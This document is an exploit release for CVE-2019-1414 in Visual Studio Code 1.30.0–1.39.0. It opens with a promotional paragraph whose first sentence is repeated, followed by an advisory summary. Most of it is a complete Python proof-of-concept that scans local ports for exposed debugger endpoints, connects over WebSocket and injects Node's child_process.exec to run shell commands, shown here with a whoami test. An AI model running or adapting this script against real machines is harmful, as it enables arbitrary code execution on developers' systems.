Visual Studio 1.39.0 Remote Debugger

Visual Studio Code 1.39.0 significantly matured its Remote Debugger capabilities, Visual Studio Code 1.39.0 significantly matured its Remote Debugger capabilities, a cornerstone of its Remote Development extensions. This feature allows developers to debug applications running on a variety of remote environments directly from their local VS Code instance.

Whether your code resides on a remote SSH server, inside a Docker container, or within a Windows Subsystem for Linux (WSL) distribution, the Remote Debugger provides a seamless experience. It establishes a connection to the remote machine, where a lightweight VS Code server handles the backend processes.

This integration lets you set breakpoints, step through code, inspect variables, and manage call stacks as if the project were local. It eliminates the need to replicate complex development environments locally, streamlining workflows for cloud-native applications, microservices, and cross-platform development. Version 1.39.0 specifically brought enhanced stability and performance to these powerful remote debugging scenarios.

=============================================================================================================================================
| # Title : Visual Studio 1.30.0 ? 1.39.0 Remote Debugger Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://code.visualstudio.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/210646/ & CVE-2019-1414 https://packetstorm.news/download/210646

[+] Summary : vulnerability in Visual Studio Code affecting versions 1.30.0 through 1.39.0.
In these versions, the remote debugger (Node.js Debug Listener) was enabled by default and listened on a local TCP port without proper restrictions. This allowed any untrusted local user to:
Enumerate the listening port Connect to the debugger endpoint Access the internal DevTools JSON API
Interact with the running VS Code process Potentially escape sandboxes or manipulate the editor environment
The issue was discovered and reported by Tavis Ormandy (Google Project Zero).
Microsoft patched the vulnerability in Visual Studio Code 1.39.1, disabling the debug listener by default and improving access restrictions.
Affected users should upgrade to the patched version or later to avoid unauthorized debugger access by local users.

[+] POC : python poc.py

#!/usr/bin/env python3
"""
VS Code Remote Debugger Exploit
by indoushka
CVE-2019-1414 (or similar - this was patched in later versions)
"""

import requests
import json
import websocket
import sys
import subprocess
import threading
from urllib.parse import urlparse

def find_vscode_debug_ports():
"""Find potential VS Code debugger ports"""
ports = []
try:
# Try netstat approach
result = subprocess.run(['netstat', '-4nlt'], capture_output=True, text=True)
for line in result.stdout.split('\n'):
if 'LISTEN' in line and '127.0.0.1' in line:
parts = line.split()
if len(parts) > 3:
addr = parts[3]
if '127.0.0.1:' in addr:
port = addr.split(':')[-1]
ports.append(int(port))
except:
pass

# Common VS Code debug ports range
common_ports = list(range(59000, 65535))
return ports + common_ports

def check_debugger_endpoint(port):
"""Check if this port has VS Code debugger"""
try:
response = requests.get(f'http://localhost:{port}/json/list', timeout=2)
if response.status_code == 200:
data = response.json()
if data and len(data) > 0:
return data
except:
pass
return None

def exploit_websocket(ws_url, command):
"""Execute command through WebSocket debug interface"""
try:
# Connect to WebSocket
ws = websocket.create_connection(ws_url)

# Debugger protocol messages to execute command
setup_messages = [
{
"id": 1,
"method": "Runtime.evaluate",
"params": {
"expression": f"require('child_process').exec('{command}', (error, stdout, stderr) => {{ console.log(stdout); }})",
"includeCommandLineAPI": True,
"silent": False,
"returnByValue": False
}
}
]

for msg in setup_messages:
ws.send(json.dumps(msg))
response = ws.recv()
print(f"[+] Response: {response}")

ws.close()
return True
except Exception as e:
print(f"[-] WebSocket exploit failed: {e}")
return False

def main():
print("[*] VS Code Remote Debugger Exploit PoC")
print("[*] Scanning for debugger endpoints...")

# Find potential ports
ports = find_vscode_debug_ports()
print(f"[*] Checking {len(ports)} potential ports...")

vulnerable_endpoints = []

for port in ports[:100]: # Limit to first 100 ports for speed
sys.stdout.write(f"\r[*] Checking port {port}...")
sys.stdout.flush()

endpoints = check_debugger_endpoint(port)
if endpoints:
print(f"\n[+] Found debugger on port {port}!")
vulnerable_endpoints.extend(endpoints)

if not vulnerable_endpoints:
print("\n[-] No vulnerable debug endpoints found")
return

print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoint(s)")

for endpoint in vulnerable_endpoints:
print(f"\n[+] Target: {endpoint.get('title', 'Unknown')}")
print(f" Type: {endpoint.get('type', 'Unknown')}")
print(f" WebSocket: {endpoint.get('webSocketDebuggerUrl', 'N/A')}")

# Test with a simple command
ws_url = endpoint.get('webSocketDebuggerUrl')
if ws_url:
# Replace with your test command
test_command = "whoami > /tmp/vscode_poc.txt && echo 'Exploit successful'"
if sys.platform == "win32":
test_command = "whoami > C:\\temp\\vscode_poc.txt && echo Exploit successful"

print(f"[*] Attempting to execute: {test_command}")
if exploit_websocket(ws_url, test_command):
print("[+] Command execution attempted!")
else:
print("[-] Command execution failed")

if __name__ == "__main__":
main()


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================